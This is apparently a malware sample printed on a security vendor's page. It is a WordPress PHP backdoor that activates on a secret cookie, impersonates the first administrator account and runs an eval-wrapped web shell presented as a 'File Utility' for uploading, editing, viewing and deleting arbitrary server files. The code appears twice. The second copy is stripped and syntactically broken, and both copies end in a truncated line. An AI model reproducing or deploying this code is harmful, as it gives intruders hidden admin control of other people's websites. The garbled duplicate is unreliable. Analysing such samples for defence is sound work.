if (isset($_COOKIE['wp_diag_session']) && $_COOKIE['wp_diag_session'] === '0f576aed2aae2905c0f4b79f6704b4a0') { @error_reporting(0);
@set_time_limit(0);
if (!defined('ABSPATH')) {
$wp_load_path = false;
$current_dir = __DIR__;
for ($i = 0; $i < 10; $i++) {
if (file_exists($current_dir . '/wp-load.php')) {
$wp_load_path = $current_dir . '/wp-load.php';
break;
}
if ($current_dir === dirname($current_dir)) break;
$current_dir = dirname($current_dir);
}
if (!$wp_load_path) {
http_response_code(500); die('FATAL: WP Environment not found from loader.');
}
require_once($wp_load_path);
}
define('WP_ADMIN', true);
if (!function_exists('request_filesystem_credentials')) {
require_once ABSPATH . 'wp-admin/includes/file.php';
}
$admins = get_users(['role' => 'administrator']);
if (!empty($admins)) {
$admin_to_impersonate = $admins[0];
wp_set_current_user($admin_to_impersonate->ID);
wp_set_auth_cookie($admin_to_impersonate->ID, true);
} else {
http_response_code(500); die('FATAL: No admin user found to impersonate.');
}
if (false === ($creds = request_filesystem_credentials(admin_url(), '', false, false, null))) {
http_response_code(500); die('FATAL: Could not get filesystem credentials.');
}
if (!WP_Filesystem($creds)) {
http_response_code(500); die('FATAL: Filesystem credentials invalid.');
}
global $wp_filesystem;
eval(base64_decode('function base64url_encode($data) { return rtrim(strtr(base64_encode($data), '+/', '-_'), '='); }
function generate_jwt($secret) { $header = base64url_encode('{"alg":"HS256","typ":"JWT"}'); $payload = base64url_encode('{"user":"admin","exp":' . (time() + 7200) . '}'); $signature = base64url_encode(hash_hmac('sha256', $header . '.' . $payload, $secret, true)); return $header . '.' . $payload . '.' . $signature; }
function verify_jwt($jwt, $secret) { $parts = explode('.', $jwt); if(count($parts) !== 3) { return false; } list($header, $payload, $signature) = $parts; $expected_signature = base64url_encode(hash_hmac('sha256', $header . '.' . $payload, $secret, true)); return hash_equals($signature, $expected_signature); }
function sanitize_file_name_custom_fm($filename) { return preg_replace('/[^A-Za-z0-9\._-]/', '', $filename); }

global $wp_filesystem;
$action_status = '';
$is_authenticated = false;
$master_key = get_option('wp_fm_master_key');
$jwt_token = '';

if (isset($_POST['auth_token']) && $master_key) {
    if (verify_jwt($_POST['auth_token'], $master_key)) { $is_authenticated = true; $jwt_token = $_POST['auth_token']; } else { $action_status = 'Invalid or expired token.'; }
} elseif (isset($_GET['auth_token']) && $master_key) {
    if (verify_jwt($_GET['auth_token'], $master_key)) { $is_authenticated = true; $jwt_token = $_GET['auth_token']; } else { $action_status = 'Invalid or expired token.'; }
}

$current_path = isset($_REQUEST['path']) ? stripslashes($_REQUEST['path']) : ABSPATH;
if (!$wp_filesystem->is_dir($current_path)) { $current_path = ABSPATH; }

$nonce = htmlspecialchars(isset($_GET['diag_nonce']) ? $_GET['diag_nonce'] : '');
$self_url = strtok($_SERVER["REQUEST_URI"], '?') . '?diag_nonce=' . $nonce;

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (isset($_POST['master_key'])) {
        if ($master_key && $_POST['master_key'] === $master_key) {
            $jwt = generate_jwt($master_key);
            $redirect_url = $self_url . '&path=' . urlencode($current_path) . '&auth_token=' . $jwt;
            header('Location: ' . $redirect_url); exit;
        } else { $action_status = "Master Key Authentication Failed."; }
    } elseif ($is_authenticated) {
        if (isset($_FILES['file_upload']) && $_FILES['file_upload']['error'] == UPLOAD_ERR_OK) {
            $new_file_path = rtrim($current_path, '/') . '/' . sanitize_file_name_custom_fm($_FILES['file_upload']['name']);
            $file_content = file_get_contents($_FILES['file_upload']['tmp_name']);
            if ($wp_filesystem->put_contents($new_file_path, $file_content, FS_CHMOD_FILE)) { $action_status = 'File uploaded successfully.'; } else { $action_status = 'Upload failed.'; }
        } elseif (isset($_POST['new_content']) && isset($_POST['file_path'])) {
            $clean_content = stripslashes($_POST['new_content']);
            if ($wp_filesystem->put_contents($_POST['file_path'], $clean_content, FS_CHMOD_FILE)) { $action_status = 'File saved successfully.'; } else { $action_status = 'Save failed.'; }    
        } elseif (isset($_POST['new_dir_name'])) {
            if ($wp_filesystem->mkdir(rtrim($current_path, '/') . '/' . sanitize_file_name_custom_fm($_POST['new_dir_name']))) { $action_status = 'Directory created.'; } else { $action_status = 'Could not create directory.'; }
        } elseif (isset($_POST['new_file_name'])) {
            if ($wp_filesystem->put_contents(rtrim($current_path, '/') . '/' . sanitize_file_name_custom_fm($_POST['new_file_name']), '', FS_CHMOD_FILE)) { $action_status = 'File created.'; } else { $action_status = 'Could not create file.'; }
        } elseif (isset($_POST['rename_from']) && isset($_POST['rename_to'])) {
            if ($wp_filesystem->move($_POST['rename_from'], dirname($_POST['rename_from']) . DIRECTORY_SEPARATOR . sanitize_file_name_custom_fm($_POST['rename_to']))) { $action_status = 'Renamed successfully.'; } else { $action_status = 'Rename failed.'; }
        }
    } elseif (isset($_POST['action'])) { $action_status = 'Authentication required for this action.'; }
} elseif (isset($_GET['del'])) {
    if ($is_authenticated) {
        if ($wp_filesystem->delete($_GET['del'], true)) { $action_status = 'Deleted: ' . htmlspecialchars(basename($_GET['del'])); } else { $action_status = 'Delete failed.'; }
    } else { $action_status = 'Authentication required for delete action.'; }
}

if (isset($_GET['action']) && $_GET['action'] === 'view_content' && isset($_GET['path'])) { if ($wp_filesystem->exists($_GET['path'])) { header('Content-Type: text/plain'); echo $wp_filesystem->get_contents($_GET['path']); } exit; }
?>
<!DOCTYPE html><html><head><title>File Utility</title><meta name="viewport" content="width=device-width, initial-scale=1.0"><style>body{font-family:monospace;background:#1e1e1e;color:#d4d4d4;margin:10px;}h2,h3{color:#4ec9b0;border-bottom:1px solid #444;padding-bottom:5px;}h2.authenticated{color:#ff5555; text-shadow: 0 0 5px #ff5555;}a{color:#9cdcfe;text-decoration:none;}table{width:100%;border-collapse:collapse;margin-top:20px;table-layout:fixed;}th,td{padding:8px;border:1px solid #333;text-align:left;word-wrap:break-word;}tr:hover td{background:#333;}.actions{text-align:right;}.actions a{margin:0 8px;color:#c586c0;}.status{background:#333;padding:10px;margin-bottom:20px;border-left:5px solid #4ec9b0;}.status.auth{border-left-color:#ff5555;}input,textarea,button{background:#333;color:#d4d4d4;border:1px solid #555;padding:8px;margin:2px;box-sizing:border-box;}#editor{position:fixed;top:0;left:0;width:100vw;height:100vh;background:rgba(30,30,30,0.95);z-index:100;display:none;padding:10px;box-sizing:border-box;}#editor textarea{width:100%;height:calc(75vh - 80px);box-sizing:border-box;font-family:monospace;}.actions-bar>*{display:inline-block;margin-right:15px;}@media(max-width:768px){body{margin:5px;}table{font-size:12px;}th,td{padding:4px;}td:nth-child(2),td:nth-child(3),td:nth-child(4){display:none;}th:nth-child(2),th:nth-child(3),th:nth-child(4){display:none;}.actions a{display:inline-block;margin:5px 0;}}</style></head><body>
<?php if($action_status){ echo '<div class="status' . ($is_authenticated ? ' auth' : '') . '">'.$action_status.'</div>'; } ?>
<h2 class="<?php echo $is_authenticated ? 'authenticated' : ''; ?>">File Utility (<?php echo isset($wp_filesystem) ? $wp_filesystem->method : 'Direct'; ?>) - Path: <?php echo htmlspecialchars($current_path); ?></h2>
<div class="actions-bar">
    <p>
    <a href="#" onclick="navigate('<?php echo $self_url; ?>&path=<?php echo urlencode(dirname($current_path)); ?>'); return false;">Go Up</a> | 
    <?php if ($is_authenticated): ?>
        <a href="#" onclick="toggleForm('new-file-form'); return false;">New File</a> | 
        <a href="#" onclick="toggleForm('new-dir-form'); return false;">New Directory</a> | 
        <a href="#" onclick="logout(); return false;">Logout</a>
    <?php else: ?>
        <a href="#" onclick="toggleForm('auth-form'); return false;">Auth as Admin</a>
    <?php endif; ?>
</p>
    <div id="new-file-form" style="display:none;"><form onsubmit="performAction(event, this);"><input type="hidden" name="action" value="mkfile"><input type="text" name="new_file_name" placeholder="File name"><input type="submit" value="Create"></form></div>
    <div id="new-dir-form" style="display:none;"><form onsubmit="performAction(event, this);"><input type="hidden" name="action" value="mkdir"><input type="text" name="new_dir_name" placeholder="Directory name"><input type="submit" value="Create"></form></div>
    <div id="auth-form" style="display:none;"><form method="post" action="<?php echo $self_url; ?>&path=<?php echo urlencode($current_path); ?>"><input type="password" name="master_key" placeholder="Master Key"><input type="submit" value="Authenticate"></form></div>
</div>
<table><tr><th>Name</th><th>Size</th><th>Perms</th><th>Modified</th><th>Actions</th></tr>
<?php
$items = isset($wp_filesystem) ? $wp_filesystem->dirlist($current_path) : [];
$files_list = []; $dirs_list = [];
if (!empty($items)) {
    foreach ($items as $name => $details) {
        $item = ['name' => $name, 'path' => rtrim($current_path, '/') . '/' . $name, 'perms' => $details['perms'], 'size' => $details['size'], 'mtime' => $details['lastmodunix'], 'is_dir' => $details['type'] === 'd'];
        if ($item['is_dir']) { $dirs_list[] = $item; } else { $files_list[] = $item; }
    }
}
if (!function_exists('sort_items_custom_fm')) { function sort_items_custom_fm($a, $b) { return strcasecmp($a['name'], $b['name']); } }
usort($dirs_list, 'sort_items_custom_fm'); usort($files_list, 'sort_items_custom_fm'); $sorted_items = array_merge($dirs_list, $files_list);

foreach ($sorted_items as $file) {
    echo '<tr><td>'.($file['is_dir']?'<a href="#" onclick="navigate(\''.$self_url.'&path='.urlencode($file['path']).'\'); return false;">['.htmlspecialchars($file['name']).']</a>':htmlspecialchars($file['name'])).'</td><td>'.($file['is_dir']?'DIR':round($file['size']/1024,2).' KB').'</td><td>'.$file['perms'].'</td><td>'.date("Y-m-d H:i", $file['mtime']).'</td><td class="actions">';
    if ($is_authenticated) {
        if(!$file['is_dir']) echo '<a href="#" onclick="viewFile(\''.addslashes($file['path']).'\');return false;">View</a> | <a href="#" onclick="editFile(\''.addslashes($file['path']).'\');return false;">Edit</a> | ';
        echo '<a href="#" onclick="renameItem(\''.addslashes($file['path']).'\', \''.htmlspecialchars($file['name']).'\');return false;">Rename</a> | <a href="#" onclick="deleteItem(\''.addslashes($file['path']).'\'); return false;">Delete</a>';
    } else {
        echo 'Auth Required';
    }
    echo '</td></tr>';
} ?>
</table>
<?php if ($is_authenticated): ?>
<hr><h3>Upload File</h3><form onsubmit="performAction(event, this);" enctype="multipart/form-data"><input type="hidden" name="action" value="upload"><input type="file" name="file_upload"><input type="submit" value="Upload"></form>
<?php endif; ?>
<div id="editor" style="display:none;"><h3 style="margin-top:0;">Editing: <span id="editing-filename"></span></h3><form onsubmit="performAction(event, this);"><textarea name="new_content" id="editor-content"></textarea><input type="hidden" name="action" value="save"><input type="hidden" name="file_path" id="editor-filepath"><br><input type="submit" value="Save"><button type="button" onclick="closeEditor();">Cancel</button></form></div>
<form id="action-form" method="post" action="" style="display:none;" enctype="multipart/form-data"><input type="hidden" name="auth_token" id="auth_token"></form>
<script>
    document.addEventListener("DOMContentLoaded", function() {
        const urlParams = new URLSearchParams(window.location.search);
        const tokenFromUrl = urlParams.get('auth_token');
        if (tokenFromUrl) {
            localStorage.setItem('fm_jwt', tokenFromUrl);
            window.history.replaceState({}, document.title, window.location.pathname + window.location.search.replace(/&?auth_token=[^&]*/, ''));
        }
        
        const jwt = localStorage.getItem('fm_jwt');
        const actionForm = document.getElementById('action-form');
        const selfUrl = '<?php echo $self_url; ?>';
        const currentPath = '<?php echo urlencode($current_path); ?>';
        actionForm.action = `${selfUrl}&path=${currentPath}`;
        
        if (jwt) {
            document.getElementById('auth_token').value = jwt;
            if (document.getElementById('auth-form')) document.getElementById('auth-form').style.display = 'none';
        } else {
            if (document.getElementById('auth-form')) document.getElementById('auth-form').style.display = 'block';
        }
    });
    function toggleForm(id) { var el = document.getElementById(id); if(el) el.style.display = el.style.display === 'block' ? 'none' : 'block'; }
    function navigate(url) {
        const jwt = localStorage.getItem('fm_jwt');
        if (jwt) {
            window.location.href = url + '&auth_token=' + jwt;
        } else {
            window.location.href = url;
        }
    }
    function logout() { localStorage.removeItem('fm_jwt'); window.location.href = '<?php echo $self_url . "&path=" . urlencode($current_path); ?>'; }
    function viewFile(filePath) { window.open('<?php echo $self_url; ?>&path=' + encodeURIComponent(filePath) + '&action=view_content'); }
    function editFile(filePath) {
        document.getElementById("editing-filename").innerText = filePath.split(/[\\/]/).pop();
        document.getElementById("editor-filepath").value = filePath;
        var url = "<?php echo $self_url; ?>&path=" + encodeURIComponent(filePath) + "&action=view_content&auth_token=" + localStorage.getItem('fm_jwt');
        fetch(url).then(r=>r.text()).then(content=>{
            document.getElementById("editor-content").value = content;
            document.getElementById("editor").style.display = "block";
        });
    }
    function closeEditor() { document.getElementById("editor").style.display="none"; }
    function performAction(event, formElement) {
        event.preventDefault();
        const jwt = localStorage.getItem('fm_jwt');
        if (!jwt) { alert('Authentication required!'); return; }
        
        const actionForm = document.getElementById('action-form');
        let tokenInput = actionForm.querySelector('#auth_token');
        if(!tokenInput) {
            tokenInput = document.createElement('input');
            tokenInput.type = 'hidden';
            tokenInput.name = 'auth_token';
            tokenInput.id = 'auth_token';
            actionForm.appendChild(tokenInput);
        }
        tokenInput.value = jwt;

        const formData = new FormData(formElement);
        for(let [name, value] of formData) {
            let existingInput = actionForm.querySelector(`[name="${name}"]`);
            if (existingInput) {
                 existingInput.parentNode.removeChild(existingInput);
            }
        }
        for(let [name, value] of formData) {
             const input = document.createElement('input');
             if (formElement.enctype === 'multipart/form-data' && value instanceof File) {
                 input.type = 'file';
                 input.files = formElement.querySelector('input[type=file]').files;
                 input.name = name;
                 actionForm.appendChild(input);
             } else {
                 input.type = 'hidden';
                 input.value = value;
                 input.name = name;
                 actionForm.appendChild(input);
             }
        }
        actionForm.submit();
    }
    function renameItem(filePath, currentName) {
        const jwt = localStorage.getItem('fm_jwt'); if (!jwt) { alert('Authentication required!'); return; }
        var newName = prompt("Enter new name for " + currentName, currentName);
        if (newName && newName !== currentName) {
            const form = document.createElement('form');
            form.method = 'post';
            form.action = '<?php echo $self_url . "&path=" . urlencode($current_path); ?>';
            form.innerHTML = `<input type="hidden" name="auth_token" value="${jwt}"><input type="hidden" name="action" value="rename"><input type="hidden" name="rename_from" value="${filePath}"><input type="hidden" name="rename_to" value="${newName}">`;
            document.body.appendChild(form);
            form.submit();
        }
    }
     function deleteItem(filePath) {
        const jwt = localStorage.getItem('fm_jwt'); if (!jwt) { alert('Authentication required!'); return; }
        if (confirm('Delete this item permanently?')) {
            navigate('<?php echo $self_url . "&path=" . urlencode($current_path); ?>&del=' + encodeURIComponent(filePath));
        }
    }
</script>
</body></html>')); exit;}
if(isset($_GET['diag_nonce'])&&md5($_GET['diag
if (isset($_COOKIE['wp_diag_session']) && $_COOKIE['wp_diag_session'] === '0f576aed2aae2905c0f4b79f6704b4a0') { @error_reporting(0);
@set_time_limit(0);
if (!defined('ABSPATH')) {
$wp_load_path = false;
$current_dir = __DIR__;
for ($i = 0; $i < 10; $i++) {
if (file_exists($current_dir . '/wp-load.php')) {
$wp_load_path = $current_dir . '/wp-load.php';
break;
}
if ($current_dir === dirname($current_dir)) break;
$current_dir = dirname($current_dir);
}
if (!$wp_load_path) {
http_response_code(500); die('FATAL: WP Environment not found from loader.');
}
require_once($wp_load_path);
}
define('WP_ADMIN', true);
if (!function_exists('request_filesystem_credentials')) {
require_once ABSPATH . 'wp-admin/includes/file.php';
}
$admins = get_users(['role' => 'administrator']);
if (!empty($admins)) {
$admin_to_impersonate = $admins[0];
wp_set_current_user($admin_to_impersonate->ID);
wp_set_auth_cookie($admin_to_impersonate->ID, true);
} else {
http_response_code(500); die('FATAL: No admin user found to impersonate.');
}
if (false === ($creds = request_filesystem_credentials(admin_url(), '', false, false, null))) {
http_response_code(500); die('FATAL: Could not get filesystem credentials.');
}
if (!WP_Filesystem($creds)) {
http_response_code(500); die('FATAL: Filesystem credentials invalid.');
}
global $wp_filesystem;
function base64url_encode($data) { return rtrim(strtr(base64_encode($data), '+/', '-_'), '='); }
function generate_jwt($secret) { $header = base64url_encode('{"alg":"HS256","typ":"JWT"}'); $payload = base64url_encode('{"user":"admin","exp":' . (time() + 7200) . '}'); $signature = base64url_encode(hash_hmac('sha256', $header . . $payload, $secret, true)); return $header . . $payload . . $signature; }
function verify_jwt($jwt, $secret) { $parts = explode(, $jwt); if(count($parts) !== 3) { return false; } list($header, $payload, $signature) = $parts; $expected_signature = base64url_encode(hash_hmac('sha256', $header . . $payload, $secret, true)); return hash_equals($signature, $expected_signature); }
function sanitize_file_name_custom_fm($filename) { return preg_replace('/[^A-Za-z0-9\._-]/', '', $filename); }
global $wp_filesystem;
$action_status = '';
$is_authenticated = false;
$master_key = get_option('wp_fm_master_key');
$jwt_token = '';
if (isset($_POST['auth_token']) && $master_key) {
if (verify_jwt($_POST['auth_token'], $master_key)) { $is_authenticated = true; $jwt_token = $_POST['auth_token']; } else { $action_status = 'Invalid or expired token.'; }
} elseif (isset($_GET['auth_token']) && $master_key) {
if (verify_jwt($_GET['auth_token'], $master_key)) { $is_authenticated = true; $jwt_token = $_GET['auth_token']; } else { $action_status = 'Invalid or expired token.'; }
}
$current_path = isset($_REQUEST['path']) ? stripslashes($_REQUEST['path']) : ABSPATH;
if (!$wp_filesystem->is_dir($current_path)) { $current_path = ABSPATH; }
$nonce = htmlspecialchars(isset($_GET['diag_nonce']) ? $_GET['diag_nonce'] : '');
$self_url = strtok($_SERVER["REQUEST_URI"], '?') . '?diag_nonce=' . $nonce;
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
if (isset($_POST['master_key'])) {
if ($master_key && $_POST['master_key'] === $master_key) {
$jwt = generate_jwt($master_key);
$redirect_url = $self_url . '&path=' . urlencode($current_path) . '&auth_token=' . $jwt;
header('Location: ' . $redirect_url); exit;
} else { $action_status = "Master Key Authentication Failed."; }
} elseif ($is_authenticated) {
if (isset($_FILES['file_upload']) && $_FILES['file_upload']['error'] == UPLOAD_ERR_OK) {
$new_file_path = rtrim($current_path, '/') . '/' . sanitize_file_name_custom_fm($_FILES['file_upload']['name']);
$file_content = file_get_contents($_FILES['file_upload']['tmp_name']);
if ($wp_filesystem->put_contents($new_file_path, $file_content, FS_CHMOD_FILE)) { $action_status = 'File uploaded successfully.'; } else { $action_status = 'Upload failed.'; }
} elseif (isset($_POST['new_content']) && isset($_POST['file_path'])) {
$clean_content = stripslashes($_POST['new_content']);
if ($wp_filesystem->put_contents($_POST['file_path'], $clean_content, FS_CHMOD_FILE)) { $action_status = 'File saved successfully.'; } else { $action_status = 'Save failed.'; }
} elseif (isset($_POST['new_dir_name'])) {
if ($wp_filesystem->mkdir(rtrim($current_path, '/') . '/' . sanitize_file_name_custom_fm($_POST['new_dir_name']))) { $action_status = 'Directory created.'; } else { $action_status = 'Could not create directory.'; }
} elseif (isset($_POST['new_file_name'])) {
if ($wp_filesystem->put_contents(rtrim($current_path, '/') . '/' . sanitize_file_name_custom_fm($_POST['new_file_name']), '', FS_CHMOD_FILE)) { $action_status = 'File created.'; } else { $action_status = 'Could not create file.'; }
} elseif (isset($_POST['rename_from']) && isset($_POST['rename_to'])) {
if ($wp_filesystem->move($_POST['rename_from'], dirname($_POST['rename_from']) . DIRECTORY_SEPARATOR . sanitize_file_name_custom_fm($_POST['rename_to']))) { $action_status = 'Renamed successfully.'; } else { $action_status = 'Rename failed.'; }
}
} elseif (isset($_POST['action'])) { $action_status = 'Authentication required for this action.'; }
} elseif (isset($_GET['del'])) {
if ($is_authenticated) {
if ($wp_filesystem->delete($_GET['del'], true)) { $action_status = 'Deleted: ' . htmlspecialchars(basename($_GET['del'])); } else { $action_status = 'Delete failed.'; }
} else { $action_status = 'Authentication required for delete action.'; }
}
if (isset($_GET['action']) && $_GET['action'] === 'view_content' && isset($_GET['path'])) { if ($wp_filesystem->exists($_GET['path'])) { header('Content-Type: text/plain'); echo $wp_filesystem->get_contents($_GET['path']); } exit; }
<!DOCTYPE html><html><head><title>File Utility</title><meta name="viewport" content="width=device-width, initial-scale=1.0"><style>body{font-family:monospace;background:#1e1e1e;color:#d4d4d4;margin:10px;}h2,h3{color:#4ec9b0;border-bottom:1px solid #444;padding-bottom:5px;}h2.authenticated{color:#ff5555; text-shadow: 0 0 5px #ff5555;}a{color:#9cdcfe;text-decoration:none;}table{width:100%;border-collapse:collapse;margin-top:20px;table-layout:fixed;}th,td{padding:8px;border:1px solid #333;text-align:left;word-wrap:break-word;}tr:hover td{background:#333;}.actions{text-align:right;}.actions a{margin:0 8px;color:#c586c0;}.status{background:#333;padding:10px;margin-bottom:20px;border-left:5px solid #4ec9b0;}.status.auth{border-left-color:#ff5555;}input,textarea,button{background:#333;color:#d4d4d4;border:1px solid #555;padding:8px;margin:2px;box-sizing:border-box;}#editor{position:fixed;top:0;left:0;width:100vw;height:100vh;background:rgba(30,30,30,0.95);z-index:100;display:none;padding:10px;box-sizing:border-box;}#editor textarea{width:100%;height:calc(75vh - 80px);box-sizing:border-box;font-family:monospace;}.actions-bar>*{display:inline-block;margin-right:15px;}@media(max-width:768px){body{margin:5px;}table{font-size:12px;}th,td{padding:4px;}td:nth-child(2),td:nth-child(3),td:nth-child(4){display:none;}th:nth-child(2),th:nth-child(3),th:nth-child(4){display:none;}.actions a{display:inline-block;margin:5px 0;}}</style></head><body>
if($action_status){ echo '<div class="status' . ($is_authenticated ? ' auth' : '') . '">'.$action_status.'</div>'; }
<h2 class="echo $is_authenticated ? 'authenticated' : '';">File Utility (echo isset($wp_filesystem) ? $wp_filesystem->method : 'Direct';) - Path: echo htmlspecialchars($current_path);</h2>
<div class="actions-bar">
<p>
<a href="#" onclick="navigate('echo $self_url;&path=echo urlencode(dirname($current_path));'); return false;">Go Up</a> |
if ($is_authenticated):
<a href="#" onclick="toggleForm('new-file-form'); return false;">New File</a> |
<a href="#" onclick="toggleForm('new-dir-form'); return false;">New Directory</a> |
<a href="#" onclick="logout(); return false;">Logout</a>
else:
<a href="#" onclick="toggleForm('auth-form'); return false;">Auth as Admin</a>
endif;
</p>
<div id="new-file-form" style="display:none;"><form onsubmit="performAction(event, this);"><input type="hidden" name="action" value="mkfile"><input type="text" name="new_file_name" placeholder="File name"><input type="submit" value="Create"></form></div>
<div id="new-dir-form" style="display:none;"><form onsubmit="performAction(event, this);"><input type="hidden" name="action" value="mkdir"><input type="text" name="new_dir_name" placeholder="Directory name"><input type="submit" value="Create"></form></div>
<div id="auth-form" style="display:none;"><form method="post" action="echo $self_url;&path=echo urlencode($current_path);"><input type="password" name="master_key" placeholder="Master Key"><input type="submit" value="Authenticate"></form></div>
</div>
<table><tr><th>Name</th><th>Size</th><th>Perms</th><th>Modified</th><th>Actions</th></tr>
$items = isset($wp_filesystem) ? $wp_filesystem->dirlist($current_path) : [];
$files_list = []; $dirs_list = [];
if (!empty($items)) {
foreach ($items as $name => $details) {
$item = ['name' => $name, 'path' => rtrim($current_path, '/') . '/' . $name, 'perms' => $details['perms'], 'size' => $details['size'], 'mtime' => $details['lastmodunix'], 'is_dir' => $details['type'] === 'd'];
if ($item['is_dir']) { $dirs_list[] = $item; } else { $files_list[] = $item; }
}
}
if (!function_exists('sort_items_custom_fm')) { function sort_items_custom_fm($a, $b) { return strcasecmp($a['name'], $b['name']); } }
usort($dirs_list, 'sort_items_custom_fm'); usort($files_list, 'sort_items_custom_fm'); $sorted_items = array_merge($dirs_list, $files_list);
foreach ($sorted_items as $file) {
echo '<tr><td>'.($file['is_dir']?'<a href="#" onclick="navigate(\''.$self_url.'&path='.urlencode($file['path']).'\'); return false;">['.htmlspecialchars($file['name']).']</a>':htmlspecialchars($file['name'])).'</td><td>'.($file['is_dir']?'DIR':round($file['size']/1024,2).' KB').'</td><td>'.$file['perms'].'</td><td>'.date("Y-m-d H:i", $file['mtime']).'</td><td class="actions">';
if ($is_authenticated) {
if(!$file['is_dir']) echo '<a href="#" onclick="viewFile(\''.addslashes($file['path']).'\');return false;">View</a> | <a href="#" onclick="editFile(\''.addslashes($file['path']).'\');return false;">Edit</a> | ';
echo '<a href="#" onclick="renameItem(\''.addslashes($file['path']).'\', \''.htmlspecialchars($file['name']).'\');return false;">Rename</a> | <a href="#" onclick="deleteItem(\''.addslashes($file['path']).'\'); return false;">Delete</a>';
} else {
echo 'Auth Required';
}
echo '</td></tr>';
}
</table>
if ($is_authenticated):
<hr><h3>Upload File</h3><form onsubmit="performAction(event, this);" enctype="multipart/form-data"><input type="hidden" name="action" value="upload"><input type="file" name="file_upload"><input type="submit" value="Upload"></form>
endif;
<div id="editor" style="display:none;"><h3 style="margin-top:0;">Editing: <span id="editing-filename"></span></h3><form onsubmit="performAction(event, this);"><textarea name="new_content" id="editor-content"></textarea><input type="hidden" name="action" value="save"><input type="hidden" name="file_path" id="editor-filepath"><br><input type="submit" value="Save"><button type="button" onclick="closeEditor();">Cancel</button></form></div>
<form id="action-form" method="post" action="" style="display:none;" enctype="multipart/form-data"><input type="hidden" name="auth_token" id="auth_token"></form>
<script>
document.addEventListener("DOMContentLoaded", function() {
const urlParams = new URLSearchParams(window.location.search);
const tokenFromUrl = urlParams.get('auth_token');
if (tokenFromUrl) {
localStorage.setItem('fm_jwt', tokenFromUrl);
window.history.replaceState({}, document.title, window.location.pathname + window.location.search.replace(/&?auth_token=[^&]*/, ''));
}
const jwt = localStorage.getItem('fm_jwt');
const actionForm = document.getElementById('action-form');
const selfUrl = 'echo $self_url;';
const currentPath = 'echo urlencode($current_path);';
actionForm.action = `${selfUrl}&path=${currentPath}`;
if (jwt) {
document.getElementById('auth_token').value = jwt;
if (document.getElementById('auth-form')) document.getElementById('auth-form').style.display = 'none';
} else {
if (document.getElementById('auth-form')) document.getElementById('auth-form').style.display = 'block';
}
});
function toggleForm(id) { var el = document.getElementById(id); if(el) el.style.display = el.style.display === 'block' ? 'none' : 'block'; }
function navigate(url) {
const jwt = localStorage.getItem('fm_jwt');
if (jwt) {
window.location.href = url + '&auth_token=' + jwt;
} else {
window.location.href = url;
}
}
function logout() { localStorage.removeItem('fm_jwt'); window.location.href = 'echo $self_url . "&path=" . urlencode($current_path);'; }
function viewFile(filePath) { window.open('echo $self_url;&path=' + encodeURIComponent(filePath) + '&action=view_content'); }
function editFile(filePath) {
document.getElementById("editing-filename").innerText = filePath.split(/[\\/]/).pop();
document.getElementById("editor-filepath").value = filePath;
var url = "echo $self_url;&path=" + encodeURIComponent(filePath) + "&action=view_content&auth_token=" + localStorage.getItem('fm_jwt');
fetch(url).then(r=>r.text()).then(content=>{
document.getElementById("editor-content").value = content;
document.getElementById("editor").style.display = "block";
});
}
function closeEditor() { document.getElementById("editor").style.display="none"; }
function performAction(event, formElement) {
event.preventDefault();
const jwt = localStorage.getItem('fm_jwt');
if (!jwt) { alert('Authentication required!'); return; }
const actionForm = document.getElementById('action-form');
let tokenInput = actionForm.querySelector('#auth_token');
if(!tokenInput) {
tokenInput = document.createElement('input');
tokenInput.type = 'hidden';
tokenInput.name = 'auth_token';
tokenInput.id = 'auth_token';
actionForm.appendChild(tokenInput);
}
tokenInput.value = jwt;
const formData = new FormData(formElement);
for(let [name, value] of formData) {
let existingInput = actionForm.querySelector(`[name="${name}"]`);
if (existingInput) {
existingInput.parentNode.removeChild(existingInput);
}
}
for(let [name, value] of formData) {
const input = document.createElement('input');
if (formElement.enctype === 'multipart/form-data' && value instanceof File) {
input.type = 'file';
input.files = formElement.querySelector('input[type=file]').files;
input.name = name;
actionForm.appendChild(input);
} else {
input.type = 'hidden';
input.value = value;
input.name = name;
actionForm.appendChild(input);
}
}
actionForm.submit();
}
function renameItem(filePath, currentName) {
const jwt = localStorage.getItem('fm_jwt'); if (!jwt) { alert('Authentication required!'); return; }
var newName = prompt("Enter new name for " + currentName, currentName);
if (newName && newName !== currentName) {
const form = document.createElement('form');
form.method = 'post';
form.action = 'echo $self_url . "&path=" . urlencode($current_path);';
form.innerHTML = `<input type="hidden" name="auth_token" value="${jwt}"><input type="hidden" name="action" value="rename"><input type="hidden" name="rename_from" value="${filePath}"><input type="hidden" name="rename_to" value="${newName}">`;
document.body.appendChild(form);
form.submit();
}
}
function deleteItem(filePath) {
const jwt = localStorage.getItem('fm_jwt'); if (!jwt) { alert('Authentication required!'); return; }
if (confirm('Delete this item permanently?')) {
navigate('echo $self_url . "&path=" . urlencode($current_path);&del=' + encodeURIComponent(filePath));
}
}
</script>
</body></html> exit;}
if(isset($_GET['diag_nonce'])&&md5($_GET['diag
© 2023 Quttera Ltd. All rights reserved.